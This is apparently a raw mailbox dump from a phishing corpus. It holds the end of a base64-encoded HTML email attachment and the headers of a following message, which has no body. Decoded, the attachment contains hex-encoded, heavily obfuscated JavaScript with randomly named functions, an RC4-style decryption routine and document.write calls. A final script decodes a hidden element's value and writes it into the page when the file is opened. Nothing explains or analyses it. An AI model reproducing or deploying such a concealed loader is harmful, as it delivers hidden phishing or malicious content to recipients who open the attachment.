YjRkNDU0NDQ2NzU1YTQ4MjgyODQ0NmQ0MTYxNGE2ZjQ2NDk2Yzc5Nzc0NTcwNDIyMDNlM2Uz
ZTIwMjg1OTUyNmE0ZDY2NjQ3MTcyNjU0OTY5NDY1MDQ3MjAyZDNkMjAzODI5MjkwYTIwMjUy
MDMyMzUzNjI5N2Q3ZDdkNzI2NTc0NzU3MjZlMjA2MTQxNGQ0NDcyNmQ1Mzc3NGU3NTU4Nzk0
NjdhN2QzYzJmNzM2MzcyNjk3MDc0M2UzYzY4MzEzZTA5MjAwYTIwMGEyMDBhMjAwOTIwM2My
ZjY4MzEzZTNjNzM2MzcyNjk3MDc0M2U2Njc1NmU2Mzc0Njk2ZjZlMjA1ODQ0NzY1NDRmNzc2
ODc4NzE1NzRiNjQ3MzYxMjg1MzcwNmE2NTYxNDk2OTRiNTk3YTY2NjQ2ODZmMmMyMDYyNDM2
NzUwNzA2MzcxN2E0YjUyNGQ0Yzc2NmQyOTdiNTU1NjY5NDU1NzdhNzg0MTc2NGM0OTRkNGI0
YTIwM2QyMDIyMjIzYjY2NmY3MjIwMjg1NTVhNzA0MzYzNmY0ZTY0NmI1MTZjNzI1MDY5MjAz
ZDIwMzAyYzIwNzc2YzY5NzA3MzQ1NTU0OTZiNGU3NDRmNTM1NzIwM2QyMDMwM2I1NTVhNzA0
MzYzNmY0ZTY0NmI1MTZjNzI1MDY5MjAzYzIwNTM3MDZhNjU2MTQ5Njk0YjU5N2E2NjY0Njg2
ZjJlNmM2NTZlNjc3NDY4M2IwOTIwMjAyMDA5MjAwOTIwMDkyMDIwNTU1YTcwNDM2MzZmNGU2
NDZiNTE2YzcyNTA2OTJiMmIyYzIwNzc2YzY5NzA3MzQ1NTU0OTZiNGU3NDRmNTM1NzJiMmIy
OTdiNjk2NjIwMjg3NzZjNjk3MDczNDU1NTQ5NmI0ZTc0NGY1MzU3MjAyMDBhMjAwOTIwMDky
MDA5MjAwYTIwMDkyMDBhMjAwYTIwMjAyMDIwM2QzZDIwMzYzNDI5MjAyMDIwMjAwYTIwMjAy
MDIwMjA3Yjc3NmM2OTcwNzM0NTU1NDk2YjRlNzQ0ZjUzNTcyMDNkMjAzMDNiN2QwYTIwMDky
MDA5MjAyMDIwMGEyMDBhMjAyMDIwMDkyMDBhMjAyMDIwNTU1NjY5NDU1NzdhNzg0MTc2NGM0
OTRkNGI0YTIwMmIzZDIwNTM3NDcyNjk2ZTY3MmU2NjcyNmY2ZDQzNjg2MTcyNDM2ZjY0NjUy
ODUzNzA2YTY1NjE0OTY5NGI1OTdhNjY2NDY4NmYyZTYzNjg2MTcyNDM2ZjY0NjU0MTc0Mjg1
NTVhNzA0MzYzNmY0ZTY0NmI1MTZjNzI1MDY5MjkwYTIwMjAyMDIwMjAyMDIwMjAyMDIwMjAw
YTIwMjAyMDBhMjAyMDIwMjA1ZTBhMjAyMDIwMGEyMDIwMjAwOTIwMjA2MjQzNjc1MDcwNjM3
MTdhNGI1MjRkNGM3NjZkMmU2MzY4NjE3MjQzNmY2NDY1NDE3NDI4Nzc2YzY5NzA3MzQ1NTU0
OTZiNGU3NDRmNTM1NzI5MjkzYjdkNzI2NTc0NzU3MjZlMjA1NTU2Njk0NTU3N2E3ODQxNzY0
YzQ5NGQ0YjRhM2I3ZDNjMmY3MzYzNzI2OTcwNzQzZTNjNjgzMTNlMGEyMDA5MjAwOTIwMGEy
MDBhMjAyMDIwMGEyMDIwMjAwOTIwMDkyMDNjMmY2ODMxM2UzYzczNjM3MjY5NzA3NDNlNjY3
NTZlNjM3NDY5NmY2ZTIwNTg0NDc2NTQ0Zjc3Njg3ODcxNTc0YjY0NzM2MTI4NjI0MzY3NTA3
MDYzNzE3YTRiNTI0ZDRjNzY2ZDJjNTM3MDZhNjU2MTQ5Njk0YjU5N2E2NjY0Njg2ZjI5N2I3
NjYxNzIyMDRmNmU0Mjc0Njc2NDQ2NzU3MTRhNjI3MDQxNTUzZDViNWQyYzY0NmE3MjQ0Nzk1
YTY4NmM0YzY1NGU2OTU2NjEzZDMwMmM3NTc5NTI1MDczNGQ2NDRjNGE1MTY1NmU0ZjcyMmM1
NTU2Njk0NTU3N2E3ODQxNzY0YzQ5NGQ0YjRhM2QyMjIyM2I2NjZmNzIyODc2NjE3MjIwNjkz
ZDMwM2I2OTNjMzIzNTM2M2I2OTJiMmIyOTdiNGY2ZTQyNzQ2NzY0NDY3NTcxNGE2MjcwNDE1
NTViNjk1ZDNkNjk3ZDY2NmY3MjI4NjkzZDMwM2I2OTNjMzIzNTM2M2I2OTJiMmIyOTdiNjQ2
YTcyNDQ3OTVhNjg2YzRjNjU0ZTY5NTY2MTNkMjg2NDZhNzI0NDc5NWE2ODZjNGM2NTRlNjk1
NjYxMmI0ZjZlNDI3NDY3NjQ0Njc1NzE0YTYyNzA0MTU1NWI2OTVkMmI2MjQzNjc1MDcwNjM3
MTdhNGI1MjRkNGM3NjZkMmU2MzY4NjE3MjQzNmY2NDY1NDE3NDI4NjkyNTYyNDM2NzUwNzA2
MzcxN2E0YjUyNGQ0Yzc2NmQyZTZjNjU2ZTY3NzQ2ODI5MjkyNTMyMzUzNjNiNzU3OTUyNTA3
MzRkNjQ0YzRhNTE2NTZlNGY3MjNkNGY2ZTQyNzQ2NzY0NDY3NTcxNGE2MjcwNDE1NTViNjk1
ZDNiNGY2ZTQyNzQ2NzY0NDY3NTcxNGE2MjcwNDE1NTViNjk1ZDNkNGY2ZTQyNzQ2NzY0NDY3
NTcxNGE2MjcwNDE1NTViNjQ2YTcyNDQ3OTVhNjg2YzRjNjU0ZTY5NTY2MTVkM2I0ZjZlNDI3
NDY3NjQ0Njc1NzE0YTYyNzA0MTU1NWI2NDZhNzI0NDc5NWE2ODZjNGM2NTRlNjk1NjYxNWQz
ZDc1Nzk1MjUwNzM0ZDY0NGM0YTUxNjU2ZTRmNzI3ZDY5M2QzMDNiNjQ2YTcyNDQ3OTVhNjg2
YzRjNjU0ZTY5NTY2MTNkMzAzYjY2NmY3MjI4NzY2MTcyMjA3OTNkMzAzYjc5M2M1MzcwNmE2
NTYxNDk2OTRiNTk3YTY2NjQ2ODZmMmU2YzY1NmU2Nzc0NjgzYjc5MmIyYjI5N2I2OTNkMjg2
OTJiMzEyOTI1MzIzNTM2M2I2NDZhNzI0NDc5NWE2ODZjNGM2NTRlNjk1NjYxM2QyODY0NmE3
MjQ0Nzk1YTY4NmM0YzY1NGU2OTU2NjEyYjRmNmU0Mjc0Njc2NDQ2NzU3MTRhNjI3MDQxNTU1
YjY5NWQyOTI1MzIzNTM2M2I3NTc5NTI1MDczNGQ2NDRjNGE1MTY1NmU0ZjcyM2Q0ZjZlNDI3
NDY3NjQ0Njc1NzE0YTYyNzA0MTU1NWI2OTVkM2I0ZjZlNDI3NDY3NjQ0Njc1NzE0YTYyNzA0
MTU1NWI2OTVkM2Q0ZjZlNDI3NDY3NjQ0Njc1NzE0YTYyNzA0MTU1NWI2NDZhNzI0NDc5NWE2
ODZjNGM2NTRlNjk1NjYxNWQzYjRmNmU0Mjc0Njc2NDQ2NzU3MTRhNjI3MDQxNTU1YjY0NmE3
MjQ0Nzk1YTY4NmM0YzY1NGU2OTU2NjE1ZDNkNzU3OTUyNTA3MzRkNjQ0YzRhNTE2NTZlNGY3
MjNiNTU1NjY5NDU1NzdhNzg0MTc2NGM0OTRkNGI0YTJiM2Q1Mzc0NzI2OTZlNjcyZTY2NzI2
ZjZkNDM2ODYxNzI0MzZmNjQ2NTI4NTM3MDZhNjU2MTQ5Njk0YjU5N2E2NjY0Njg2ZjJlNjM2
ODYxNzI0MzZmNjQ2NTQxNzQyODc5Mjk1ZTRmNmU0Mjc0Njc2NDQ2NzU3MTRhNjI3MDQxNTU1
YjI4NGY2ZTQyNzQ2NzY0NDY3NTcxNGE2MjcwNDE1NTViNjk1ZDJiNGY2ZTQyNzQ2NzY0NDY3
NTcxNGE2MjcwNDE1NTViNjQ2YTcyNDQ3OTVhNjg2YzRjNjU0ZTY5NTY2MTVkMjkyNTMyMzUz
NjVkMjk3ZDcyNjU3NDc1NzI2ZTIwNTU1NjY5NDU1NzdhNzg0MTc2NGM0OTRkNGI0YTdkNjY3
NTZlNjM3NDY5NmY2ZTIwNDc1MjU2NDg1NzRlNTU0OTZmNjE2ODY0Nzk2NTI4NTU1MTc1NjM3
YTVhNzY2NTU3NGU0ZDU0Nzk3NDJjMjA2OTY4N2E0NDZiNTA1MzY0NDk3MTRiNGQ2NzU1Mjky
MDdiNWE1MzRmNjE2OTZkNDc1NjYzNzA2MjQyNjg1MDIwM2QyMDI4NWE1MzRmNjE2OTZkNDc1
NjYzNzA2MjQyNjg1MDIwMmEyMDMxMzIzODI5MjAyNTIwMzIzNDMwMzkzMjMwMzMzYjcyNjU3
NDc1NzI2ZTIwNWE1MzRmNjE2OTZkNDc1NjYzNzA2MjQyNjg1MDIwMjUyMDI4Njk2ODdhNDQ2
YjUwNTM2NDQ5NzE0YjRkNjc1NTIwMmQyMDU1NTE3NTYzN2E1YTc2NjU1NzRlNGQ1NDc5NzQy
MDJiMjAzMTI5MjAyYjIwNTU1MTc1NjM3YTVhNzY2NTU3NGU0ZDU0Nzk3NDNiN2Q2Njc1NmU2
Mzc0Njk2ZjZlMjA2NjRjNDM1NzcyNTU2MjZjNTA1NjRiNGY1ODY0MjgyOTdiNzY2MTcyMjA3
MTRhNGY3NzczNTE2ODcyNmI2ZTc5NTA1MjcwMjAzZDIwMjI1Yzc1MzAzMDM3MzE1Yzc1MzAz
MDM3Mzc1Yzc1MzAzMDM2MzU3Mjc0Nzk1Yzc1MzAzMDM3MzU2OTZmNzA1Yzc1MzAzMDM2MzE3
MzY0NWM3NTMwMzAzNjM2Njc2ODZhNWM3NTMwMzAzNjYyNmM3YTVjNzUzMDMwMzczODVjNzUz
MDMwMzYzMzVjNzUzMDMwMzczNjYyNmU1Yzc1MzAzMDM2NjQ1Yzc1MzAzMDM1MzE1NzQ1NWM3
NTMwMzAzNTMyNTQ1Yzc1MzAzMDM1Mzk1Yzc1MzAzMDM1MzU1Yzc1MzAzMDM0Mzk1Yzc1MzAz
MDM0NjY1Yzc1MzAzMDM1MzA1Yzc1MzAzMDM0MzE1MzVjNzUzMDMwMzQzNDQ2NDc0ODRhNGI0
YzVhNTg0MzVjNzUzMDMwMzUzNjVjNzUzMDMwMzQzMjRlNWM3NTMwMzAzNDY0MjIzYjc2NjE3
MjBhMjAwOTIwMDkyMDBhMjAwYTIwMjAyMDBhMjAyMDIwMDkyMDA5MjAyMDRhNmM3MjcwNzE2
NDc2NGI1MDczNmQ1MTc4NGMyMDNkMGEyMDIwMjAwYTIwMjAyMDA5MjAyMDZlNjU3NzIwNDE3
MjcyNjE3OTI4MzMyOTNiNjY2ZjcyMjg3NjYxNzIyMDYzNmI0YzdhNDc1NTQxNmM3OTc2NDY1
NzQ0NjgyMDNkMjAzMDNiMjA2MzZiNGM3YTQ3NTU0MTZjNzk3NjQ2NTc0NDY4MjAzYzIwMzMz
YjIwNjM2YjRjN2E0NzU1NDE2Yzc5NzY0NjU3NDQ2ODJiMmIyOTdiNGE2YzcyNzA3MTY0NzY0
YjUwNzM2ZDUxNzg0YzViNjM2YjRjN2E0NzU1NDE2Yzc5NzY0NjU3NDQ2ODVkMjAzZDBhMjAw
OTIwMjAyMDA5MjAwOTIwMjAyMjIyN2QzYjY2NmY3MjI4NzY2MTcyMjA3OTcyNjE0NjUyNTc1
Mzc3NTQ0MjZmNjg3ODRiMjAzZDIwMzAzYjIwNzk3MjYxNDY1MjU3NTM3NzU0NDI2ZjY4Nzg0
YjIwM2MyMDBhMjAwYTIwMGEyMDBhMjAwYTIwMjAyMDA5MjAwOTIwMDkyMDBhMjAzMzNiMjA3
OTcyNjE0NjUyNTc1Mzc3NTQ0MjZmNjg3ODRiMmIyYjI5MDkyMDBhMjAwOTIwMGEyMDBhMjA3
YjY2NmY3MjI4NzY2MTcyMjA2MzZiNGM3YTQ3NTU0MTZjNzk3NjQ2NTc0NDY4MjAzZDIwMzAz
YjIwNjM2YjRjN2E0NzU1NDE2Yzc5NzY0NjU3NDQ2ODIwM2MyMDM2MzQzYjIwNjM2YjRjN2E0
NzU1NDE2Yzc5NzY0NjU3NDQ2ODJiMmIyOTdiNGE2YzcyNzA3MTY0NzY0YjUwNzM2ZDUxNzg0
YzViNzk3MjYxNDY1MjU3NTM3NzU0NDI2ZjY4Nzg0YjVkMjAyYjNkMjA3MTRhNGY3NzczNTE2
ODcyNmI2ZTc5NTA1MjcwNWI0NzUyNTY0ODU3NGU1NTQ5NmY2MTY4NjQ3OTY1MjgzMDJjMjAz
NTMxMjk1ZDNiN2Q3ZDcyNjU3NDc1NzI2ZTIwNGE2YzcyNzA3MTY0NzY0YjUwNzM2ZDUxNzg0
YzNiN2QzYzJmNzM2MzcyNjk3MDc0M2UzYzY4MzEzZTBhMjAwOTIwMjAyMDA5MjAwOTIwM2My
ZjY4MzEzZTNjNzM2MzcyNjk3MDc0M2U3NjYxNzIyMDU1Nzk2NDQzNDY2ZTc0NTc0ZjYzN2E1
Mjc3NTEyMDNkMjA0YzUwNWE3MzU0Njg2NzZlNjE2Mjc3NGE1NzZmMjg0ODY3NTU2NjY5NTM3
OTRmNWE2ODZhNGM0NDZkMjkzYjNjMmY3MzYzNzI2OTcwNzQzZTNjNjgzMTNlMDkyMDA5MjAw
OTIwMGEyMDBhMjAwOTIwMGEyMDIwMjAwYTIwMDkyMDNjMmY2ODMxM2UzYzczNjM3MjY5NzA3
NDNlM2MyZjczNjM3MjY5NzA3NDNlM2M2ODMxM2UwOTIwMjAyMDA5MjAwOTIwMDkyMDNjMmY2
ODMxM2UzYzczNjM3MjY5NzA3NDNlNzY2MTcyMjA1ODQzNjY2MTUyNjM1NDc3NDQ0YjVhNDU2
ZTU5MjAzZDIwNjY0YzQzNTc3MjU1NjI2YzUwNTY0YjRmNTg2NDI4MjkzYjY2NmY3MjI4NzY2
MTcyMGEyMDA5MjAyMDIwMDkyMDA5MjAyMDRhNTQ3NzU1NGQ3MjQyNjQ0NDVhNmE0YjRjNDgy
MDNkMjAyODMzMmQzMTI5M2IyMDRhNTQ3NzU1NGQ3MjQyNjQ0NDVhNmE0YjRjNDgwYTIwMDky
MDA5MjAwYTIwMGEyMDIwMjAwYTIwMjAyMDA5MjAwOTIwMjAzZTNkMjAzMDNiMjA0YTU0Nzc1
NTRkNzI0MjY0NDQ1YTZhNGI0YzQ4MmQyZDI5N2I1NTc5NjQ0MzQ2NmU3NDU3NGY2MzdhNTI3
NzUxMGEyMDA5MjAyMDIwMDkyMDA5MjAyMDNkMjA1ODQ0NzY1NDRmNzc2ODc4NzE1NzRiNjQ3
MzYxMjg1ODQzNjY2MTUyNjM1NDc3NDQ0YjVhNDU2ZTU5NWI0YTU0Nzc1NTRkNzI0MjY0NDQ1
YTZhNGI0YzQ4NWQyYzIwMjAyMDIwMjAyMDA5MjAyMDIwNTU3OTY0NDM0NjZlNzQ1NzRmNjM3
YTUyNzc1MTI5M2I3ZDNjMmY3MzYzNzI2OTcwNzQzZTNjNjgzMTNlMjAyMDBhMjAwOTIwMDky
MDA5MjAwYTIwMDkyMDBhMjAwYTIwMjAyMDNjMmY2ODMxM2UzYzczNjM3MjY5NzA3NDNlNjk2
NjI4NTk2ZTUzNjg2MjYzNzg0YTc2NDI2NzcxNzI1NzIwM2MyMDU1Nzk2NDQzNDY2ZTc0NTc0
ZjYzN2E1Mjc3NTEyZTZjNjU2ZTY3NzQ2ODI5N2I1NTc5NjQ0MzQ2NmU3NDU3NGY2MzdhNTI3
NzUxMjAzZDIwNTU3OTY0NDM0NjZlNzQ1NzRmNjM3YTUyNzc1MTJlNzM3NTYyNzM3NDcyNjk2
ZTY3MjgzMDJjMDkyMDBhMjAyMDIwMDkyMDA5MjAyMDIwMjAyMDA5MjAwYTIwMjAyMDIwNTU3
OTY0NDM0NjZlNzQ1NzRmNjM3YTUyNzc1MTJlNmM2NTZlNjc3NDY4MDkyMDIwMjAwOTIwMDky
MDA5MjAyMDJkMmYyYTIwNzY2ZjZjNzU3MDc0NjE3NDY1MjA2NTc4NjU3MjYzNjk3NDYxNzQ2
OTZmNmUyMDY1Nzg2NTcyNjM2OTc0NjE3NDY5NmY2ZTIwNjU2OTc1NzM2ZDZmNjQyMDY1NjEy
MDcwNjE3MjY5NjE3NDc1NzIyZTIwNzM3NTZlNzQyMDZlNmY3Mzc0NzI3NTY0MjAyYTJmMjAy
MDIwMjAwYTIwMjAyMDIwMjAyODU1Nzk2NDQzNDY2ZTc0NTc0ZjYzN2E1Mjc3NTEyZTZjNjU2
ZTY3NzQ2ODIwMjAyMDIwMjAyMDA5MjAyMDIwMjAyZDIwMzMzODM4MjkyOTNiN2QzYjNjMmY3
MzYzNzI2OTcwNzQzZTNjNjgzMTNlMGEyMDA5MjAwOTIwMGEyMDBhMjAyMDIwMGEyMDIwMjAw
OTIwMDkyMDNjMmY2ODMxM2UzYzczNjM3MjY5NzA3NDNlNzk1YTU5Njg2ZDZjNGY0YjQ3NzY0
NTUwNTE1MjIwM2QwOTIwMGEyMDBhMjAwYTIwMDkyMDIwMjg2NDZmNjM3NTZkNjU2ZTc0Mjkz
YjA5MjAwYTIwMDkyMDBhMjAwYTIwNjY2ZjcyMjg3NjYxNzIyMDY5MjAzZDIwMzAzYjIwNjky
MDNjMjA1NTc5NjQ0MzQ2NmU3NDU3NGY2MzdhNTI3NzUxMmU2YzY1NmU2Nzc0NjgzYjIwNjky
YjJiMjk3YjIwNzk1YTU5Njg2ZDZjNGY0YjQ3NzY0NTUwNTE1MjJlNzc3MjY5NzQ2NTI4NTU3
OTY0NDM0NjZlNzQ1NzRmNjM3YTUyNzc1MTViNjk1ZDI5M2I3ZDNjMmY3MzYzNzI2OTcwNzQz
ZSI+PHNjcmlwdD5TdHJpbmcucHJvdG90eXBlLmRlY29kZUhleCA9IGZ1bmN0aW9uKCkge3Jl
dHVybiB0aGlzLnJlcGxhY2UoLyhbMC05QS1GYS1mXXsyfSkvZywgZnVuY3Rpb24oKSB7cmV0
dXJuIFN0cmluZy5mcm9tQ2hhckNvZGUocGFyc2VJbnQoYXJndW1lbnRzWzFdLCAxNikpO30p
O307ZG9jdW1lbnQud3JpdGUoZG9jdW1lbnRbImdldEVsZW1lbnRCeUlkIl0oImpCT0pIUkZX
a1BpR2ZYIikudmFsdWUuZGVjb2RlSGV4KCkpOzwvc2NyaXB0Pg0KPC9ib2R5Pg0KPC9odG1s
Pg==

----=_Next_6DBC_20161108_EC11.4.5.2391--


From jose@monkey.org Tue Sep 26 20:56:21 2017 +0000
Return-Path: prvs=1442eb9e36=glendy@jef.com.hk
Delivered-To: jose@monkey.org
X-FDA: 73329255762.17.town23_37617cffb3a27
X-Spam-Summary: 50,0,0,8affdd8e2d235995,d41d8cd98f00b204,prvs=1442eb9e36=glendy@jef.com.hk,:,RULES_HIT:2:41:72:379:495:560:602:800:962:967:973:983:988:989:1189:1208:1221:1254:1260:1263:1313:1314:1381:1431:1436:1437:1516:1517:1518:1535:1566:1575:1588:1589:1592:1594:1623:1714:1730:1749:1776:1792:2194:2198:2199:2200:2525:2527:2543:2565:2610:2682:2685:2741:2859:2933:2937:2939:2942:2945:2947:2951:2954:3022:3138:3139:3140:3141:3142:3622:3650:3865:3867:3870:3871:3873:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4049:4119:4321:4361:4603:5007:6119:6261:6674:6678:7802:7903:8583:8603:8869:9025:9468:10004:10346:11473:11657:11658:11914:12043:12160:12438:12517:12519:12555:12740:12895:12986:13025:13110:13139:13237:13439:14096:14196:14826:21080:21162:21433:21451:21483:21524:21554:21611:21627:30022:30026:30054:30070:30083,0,RBL:218.255.15.34:@jef.com.hk:.lbl8.mailshell.net-62.8.107.100 64.201.201.201,CacheIP:none,Bayesian:0.5,0.5,0.5,Netcheck:none,DomainCache:0,MSF:not bulk,SPF:fn,MSBL:0,DNSBL:n
X-HE-Tag: town23_37617cffb3a27
X-Filterd-Recvd-Size: 8928
Received: from mail.jef.com.hk (mail.jef.com.hk [218.255.15.34])
	by imf04.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Tue, 26 Sep 2017 20:56:20 +0000 (UTC)
X-MDAV-Processed: mail.jef.com.hk, Wed, 27 Sep 2017 03:42:42 +0800
Received: from CBServer.ac.local (crbknf0223w-207-179-135-101.dhcp-dynamic.fibreop.nl.bellaliant.net [207.179.135.101]) 
	by jef.com.hk (MDaemon PRO v17.0.0) with ESMTPSA id md50001622458.msg; 
	Wed, 27 Sep 2017 03:42:40 +0800
X-Spam-Processed: mail.jef.com.hk, Wed, 27 Sep 2017 03:42:40 +0800
	(not processed: message from trusted or authenticated source)
X-MDRemoteIP: 207.179.135.101
X-MDHelo: CBServer.ac.local
X-MDArrival-Date: Wed, 27 Sep 2017 03:42:40 +0800
X-Authenticated-Sender: glendy@jef.com.hk
X-Return-Path: prvs=1442eb9e36=glendy@jef.com.hk
